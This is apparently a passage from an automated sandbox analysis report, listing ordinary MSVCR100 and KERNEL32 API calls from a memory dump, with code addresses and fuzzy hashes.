                                                                                                          • Opcode Fuzzy Hash: 4ef8b9ee704a7458509e7f09e881a49ca371c0b68843910309f19d02bb2e2d14
                                                                                                          • Instruction Fuzzy Hash: 7FF0B431414B48EBDB803BB5DD0C7993B98AF823B5F089311F438880E4DB31F4519760
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          • Opcode ID: d552fdc41d0a17269453c049ea4ab7478cc2383e6b2677a25f3d3619a094d3df
                                                                                                          • Instruction ID: 5b54b9314ebd551fda38b1522a27f5c863b47939cc4b898c52c37be157745826
                                                                                                          • Opcode Fuzzy Hash: d552fdc41d0a17269453c049ea4ab7478cc2383e6b2677a25f3d3619a094d3df
                                                                                                          • Instruction Fuzzy Hash: 4951C239351311CBE364CF6DC980706B3A2AF59728B24E65AF405CF2A2E376F8438795
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,00000000,00000000), ref: 6FDDC4BC
                                                                                                          • _errno.MSVCR100(?,00000001,00000000), ref: 6FDDC4E0
                                                                                                          • _errno.MSVCR100(?,00000001,00000000), ref: 6FDDC4FE
                                                                                                          • _isleadbyte_l.MSVCR100(00000001,00000001,00000001,?,00000001,00000000), ref: 6FDDC523
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,00000001,?,00000001,00000000), ref: 6FDDC56B
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,00000001,?,00000001,00000000), ref: 6FDDC59E
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$_errno$_isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3480106409-0
                                                                                                          • Opcode ID: 97af164e9605cb4876375074a0314594c6156bdf1291e87e94274f30f50f4873
                                                                                                          • Instruction ID: 12e984f028b95b88400550eac65145595d3efc3a1a2c6e4a148259a5293ebc25
                                                                                                          • Opcode Fuzzy Hash: 97af164e9605cb4876375074a0314594c6156bdf1291e87e94274f30f50f4873
                                                                                                          • Instruction Fuzzy Hash: 08518175600356EFEB628F24C844BBA3BA4AF42359F05855AF864CF2D0D730F941CBA1
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000000), ref: 6FDDBE42
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000), ref: 6FDDBE4C
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(?,00000000), ref: 6FDDBE6F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000), ref: 6FDDBE79
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(0000000B,6FD8AD58,00000018,6FD8AFDD,00000000,?), ref: 6FD8AD15
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • EnterCriticalSection.KERNEL32(?,6FD8AD58,00000018,6FD8AFDD,00000000,?), ref: 6FD8AD94
                                                                                                          • _calloc_crt.MSVCR100(00000020,00000040,6FD8AD58,00000018,6FD8AFDD,00000000,?), ref: 6FDB04B5
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterSection$_calloc_crt_lock
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA246
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA250
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _get_timezone.MSVCR100(?), ref: 6FDDA271
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6FDDA297
                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6FDDA2D9
                                                                                                          Similarity
                                                                                                          • API ID: Time$FileInformationSystemZone_errno_get_timezone_invalid_parameter_invalid_parameter_noinfo
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDE002C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDE0036
                                                                                                          • strnlen.MSVCR100(?,00000000), ref: 6FDE0046
                                                                                                          • __crtLCMapStringA.MSVCR100(?,?,00000100,?,00000002,?,00000002,?,00000001,?), ref: 6FDE009B
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?), ref: 6FDE00E6
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?), ref: 6FDE00F4
                                                                                                          Similarity
                                                                                                          • API ID: _errno$String__crt_invalid_parameter_noinfostrnlen
                                                                                                          APIs
                                                                                                          • GetCurrentThread.KERNEL32 ref: 6FDB886E
                                                                                                          • memset.MSVCR100(?,00000000,0000000C), ref: 6FDB88A9
                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,6FDBD091,?,00000000), ref: 6FDB88D7
                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,00000000), ref: 6FDB8903
                                                                                                          • TlsGetValue.KERNEL32(?,?,00000024,6FDC28C6,?,00000000,?,6FDC2AD0,?,?,00000000,?,?,00000000,?), ref: 6FDB8925
                                                                                                          • TlsSetValue.KERNEL32(?,00000000,?,6FDC2AD0,?,?,00000000,?,?,00000000,?), ref: 6FDB8930
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSectionValue$CurrentEnterLeaveThreadmemset
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00000001,?,?,?,?,6FD86435,?,?,?), ref: 6FD86375
                                                                                                          • memset.MSVCR100(00000000,00000000,00000000,?,?,?,6FD86435,?,?,?,?,?,?,?,?,?), ref: 6FD863BB
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6FD863D0
                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6FD863DE
                                                                                                          • _freea_s.MSVCR100(00000000), ref: 6FD863E8
                                                                                                          • malloc.MSVCR100(00000008,?,?,?,6FD86435,?,?,?,?,?,?,?,?,?,?,?), ref: 6FDB0CE9
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$StringType_freea_smallocmemset
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7946
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7950
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD8033A,?,?,00000000), ref: 6FDA795C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7966
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7972
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7991
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          APIs
                                                                                                          • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6FD843D7
                                                                                                            • Part of subcall function 6FD8254C: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6FD82590
                                                                                                          • _towlower_l.MSVCR100(00000000,?,?,?,?,?,?), ref: 6FD843EA
                                                                                                          • _errno.MSVCR100(?), ref: 6FDAC4F1
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDAC4FC
                                                                                                          • _errno.MSVCR100(?,?), ref: 6FDAC517
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6FDAC522
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_towlower_l$iswctype
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD3F38,0000000C), ref: 6FDD3E49
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD3F38,0000000C), ref: 6FDD3E54
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,6FDD3F38,0000000C), ref: 6FDD3E71
                                                                                                          • _fileno.MSVCR100(?,?,?,6FDD3F38,0000000C), ref: 6FDD3E81
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,6FDD3F38,0000000C), ref: 6FDD3EDB
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,?,6FDD3F38,0000000C), ref: 6FDD3EE6
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_fileno_invalid_parameter_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 1742103896-0
                                                                                                          APIs
                                                                                                          • _tolower_l.MSVCR100(00000000,00000000,00000000,0000009E,7FFFFFFF,00000000), ref: 6FD8FFFE
                                                                                                          • _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,0000009E,7FFFFFFF,00000000), ref: 6FD9000D
                                                                                                          • _errno.MSVCR100(00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAC401
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAC40C
                                                                                                          • _errno.MSVCR100(00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAC428
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAC433
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_tolower_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295542030-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDF6C58,0000002C), ref: 6FDF6B57
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF6C58,0000002C), ref: 6FDF6B62
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • HeapWalk.KERNEL32(?,6FDF6C58,0000002C), ref: 6FDF6B8B
                                                                                                          • HeapValidate.KERNEL32(00000000,00000000,6FDF6C58,0000002C), ref: 6FDF6BAC
                                                                                                          • HeapWalk.KERNEL32(?,?,?,?,?,?,?,6FDF6C58,0000002C), ref: 6FDF6BD3
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,6FDF6C58,0000002C), ref: 6FDF6C16
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Walk$ErrorLastValidate_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4251274765-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD4151
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD415C
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD4176
                                                                                                          • _fileno.MSVCR100(?,6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD4186
                                                                                                          • _errno.MSVCR100(6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD41E0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD41EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_fileno_invalid_parameter_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 1742103896-0
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDBEFCD
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 6FDBEFED
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6FDBEFF9
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDBF02B
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDBF035
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDBF081
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: CountTick$CriticalSection$EnterLeaveObjectSingleWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 2379733562-0
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,?,?,?,6FD93129,?), ref: 6FD8CDC5
                                                                                                          • _read.MSVCR100(00000000,?,?,?,?,6FD93129,?), ref: 6FD8CDCC
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CDEF
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CDFF
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CE10
                                                                                                          • _fileno.MSVCR100(?,?), ref: 6FD8CE20
                                                                                                          • _errno.MSVCR100(?,?,6FD93129,?), ref: 6FDA870C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD93129,?), ref: 6FDA8717
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$_errno_invalid_parameter_noinfo_read
                                                                                                          • String ID:
                                                                                                          • API String ID: 2022966298-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F00
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F0B
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(00000000,?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F2B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F36
                                                                                                          • _tolower_l.MSVCR100(?,?,0000009C,00000000,?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F6F
                                                                                                          • _tolower_l.MSVCR100(00000000,?,?,?,0000009C,00000000,?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F7E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_tolower_l$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 2286559371-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD401A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD4024
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD405B
                                                                                                          • _errno.MSVCR100 ref: 6FDD4066
                                                                                                          • _lock_file.MSVCR100(?,6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD4077
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fclose_nolock.MSVCR100(?,6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD4087
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_fclose_nolock_invalid_parameter_invalid_parameter_noinfo_lock_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 1408780765-0
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,6FDC9E6A), ref: 6FDC9E8A
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDC9EAA
                                                                                                          • Sleep.KERNEL32(00000000), ref: 6FDC9EC0
                                                                                                          • InterlockedPushEntrySList.KERNEL32(?,-00000008), ref: 6FDC9EF7
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FDC9F20
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDC9F3B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          APIs
                                                                                                          • InitializeSListHead.KERNEL32(?,00000010,6FDC6D69,00000000,?), ref: 6FDC69A4
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC69D7
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC69EF
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC69FD
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC6A17
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6FDC6A25
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDB62E7: ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,6FDB8AE8,?,000000FF), ref: 6FDB6365
                                                                                                            • Part of subcall function 6FDB62E7: memset.MSVCR100(00000000,00000000,?,00000000,6FDB8AE8,?,000000FF), ref: 6FDB6377
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00000001,00000010,6FDC0C24,00000000,00000000,00000000,?,?,00000000,6FE1FF1C), ref: 6FDB8B03
                                                                                                          • GetLastError.KERNEL32(?,?,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8B13
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,?,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8B2B
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,?,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8B39
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000001C,00000000,?,?,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8B4B
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDB8B80
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDF66E4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDF66EF
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDF6707
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDF6712
                                                                                                          APIs
                                                                                                          • HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7), ref: 6FD80263
                                                                                                          • _callnewh.MSVCR100(00000001,00000001,00000000,00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001), ref: 6FDAF24D
                                                                                                          • _callnewh.MSVCR100(00000001,00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDAF270
                                                                                                          • _errno.MSVCR100(00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5), ref: 6FDAF276
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4CDD
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4CE8
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4CF6
                                                                                                          • _filbuf.MSVCR100(?,?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4D1A
                                                                                                          • feof.MSVCR100(?,?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4D29
                                                                                                          • ferror.MSVCR100(?,?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4D34
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFA078,00000014), ref: 6FDF9FD3
                                                                                                          • _errno.MSVCR100(6FDFA078,00000014), ref: 6FDF9FDA
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA078,00000014), ref: 6FDF9FE5
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcslen.MSVCR100(?,6FDFA078,00000014), ref: 6FDFA009
                                                                                                          • _lock.MSVCR100(00000003,?,6FDFA078,00000014), ref: 6FDFA012
                                                                                                          • WriteConsoleW.KERNEL32(?,00007FFF,?,00000000,6FDFA078,00000014), ref: 6FDFA039
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFCE1F
                                                                                                          • _errno.MSVCR100 ref: 6FDFCE5B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCE2A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFCE3B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCE46
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCE66
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFCD96
                                                                                                          • _errno.MSVCR100 ref: 6FDFCDD2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCDA1
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFCDB2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCDBD
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCDDD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: a0e5582b95a53bf3950720f09358867b88317c0b841a58f42ebc932bc15a5fed
                                                                                                          • Instruction ID: c13e66d727f43ee2693979e1e87919b2132b923bc90e9726fe79e2f5130e91d2
                                                                                                          • Opcode Fuzzy Hash: a0e5582b95a53bf3950720f09358867b88317c0b841a58f42ebc932bc15a5fed
                                                                                                          • Instruction Fuzzy Hash: 10018471646709DFCB925F64DC40D8E7BA4EF813A4B230526E49597040E735BAA3C7B1
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FD8A7B0,00000010), ref: 6FD8A7D4
                                                                                                          • __doserrno.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF4D6
                                                                                                          • _errno.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF4DE
                                                                                                          • _errno.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF4F4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF4FF
                                                                                                          • _errno.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF506
                                                                                                            • Part of subcall function 6FD8A4DF: EnterCriticalSection.KERNEL32(00000108,6FD8A540,0000000C,6FD8ECC3,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?), ref: 6FD8A530
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?,?,?,?,6FD8A795,?,6FD8A7B0,00000010), ref: 6FD8A6C5
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?), ref: 6FD8A6E8
                                                                                                            • Part of subcall function 6FD8A6BA: CloseHandle.KERNEL32(00000000), ref: 6FD8A6EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$__doserrno_get_osfhandle$CloseCriticalEnterHandleSection_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1720121285-0
                                                                                                          • Opcode ID: 7cbb14ac507a232003dae03007b89c04cb6bb061ee39fbf4342adaf3609d9b61
                                                                                                          • Instruction ID: 1f2b7a4290bc34da86121a86b981ea908122b032ae5b30e948118077138faada
                                                                                                          • Opcode Fuzzy Hash: 7cbb14ac507a232003dae03007b89c04cb6bb061ee39fbf4342adaf3609d9b61
                                                                                                          • Instruction Fuzzy Hash: 3911AC71801705EFE7D19F78CD8436937B0AF02328F125286D0345B5D1DBBCB9419B65
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD8200,0000000C), ref: 6FDD816E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD8200,0000000C), ref: 6FDD8179
